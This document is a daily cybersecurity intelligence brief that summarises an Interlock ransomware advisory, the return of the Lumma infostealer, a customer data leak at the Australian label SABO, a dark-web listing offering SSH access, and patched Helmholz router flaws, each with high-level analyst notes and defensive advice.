ZeroFox Daily Intelligence Brief - July 23, 2025
|by Alpha Team
ZeroFox Daily Intelligence Brief - July 23, 2025
ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.
Brief Highlights
- Joint Advisory Issued on Protecting Against Interlock Ransomware
- Lumma Infostealer Back After Law Enforcement Seizure
- 3.5 Million Customer Records Exposed in Alleged Data Breach at Australian Label SABO
Joint Advisory Issued on Protecting Against Interlock Ransomware
What we know: CISA and partners have issued a joint Cybersecurity Advisory warning organizations about Interlock ransomware, which targets popular operating systems and uses double extortion tactics after breaching networks.
Context: Interlock has been active since late September 2024, targeting businesses and critical infrastructure across North America and Europe. It gains access through drive-by downloads and ClickFix social engineering, then spreads laterally within networks.
Analyst note: Interlock attacks are likely to result in network compromise, data theft, financial loss, and operational disruption. Organizations are advised to strengthen defenses via DNS filtering, firewalls, user awareness, timely patching, network segmentation, and robust access controls with multi-factor authentication.
Lumma Infostealer Back After Law Enforcement Seizure
What we know: The Lumma infostealer has made a comeback after law enforcement seized five related domains in May 2025.Threat actors have been trying to restore Lumma operations since its takedown.
Context: Researchers suspect that its resurgence involves additional precautions, such as moving from a trusted and popular internet infrastructure provider to a Russia-based service provider, while diversifying malware deployment and exploiting multiple distribution channels.
Analyst note: As Lumma scales its distribution, infection rates across corporate and personal devices are likely to spike. More stolen credentials, cookies, and sensitive data could end up for sale on dark web forums.
3.5 Million Customer Records Exposed in Alleged Data Breach at Australian Label SABO
Source: https://hackread.com/global-fashion-label-sabo-customer-records-leaked/
What we know: Australia-based fashion brand SABO has reportedly been affected by a data breach, exposing over 3.5 million customer records. The data was leaked due to an alleged misconfigured database, which was unprotected without any password.
Context: It is unknown if the database was managed by SABO or a third party. The leaked data, dated from 2015 to June 27, 2025, includes personally identifiable information (PII) for both retail and commercial customers, such as their names, addresses, order details, and phone numbers.
Analyst note: Threat actors are likely to use the data to target exposed individuals with social engineering and phishing attacks, aimed at extortion. The data leak is likely to pose a reputational threat to the brand.
DEEP AND DARK WEB INTELLIGENCE
BreachForums user ari: Untested threat actor "ari" has advertised secure shell (SSH) access to a Linux server of the Saudi Arabian Ministry of Transport on BreachForums. Ari did not specify the prices, and invited relevant buyers to contact them via forum's private messaging. Unauthorized access could enable threat actors to steal sensitive data, disrupt transport operations, or use the compromised server as a foothold for broader attacks.
VULNERABILITY AND EXPLOIT INTELLIGENCE
Helmholz Vulnerabilities: Eight vulnerabilities, including three flaws enabling operating system command execution, were discovered in Helmholz REX 100 industrial routers and have since been patched. If users do not update to the latest version (2.3.3), these vulnerabilities could enable threat actors to gain root access, exfiltrate sensitive data, and disrupt operations.
Affected products: Helmholz REX 100 routers running firmware version 2.3.2 and earlier
Tags: DIB, tlp:green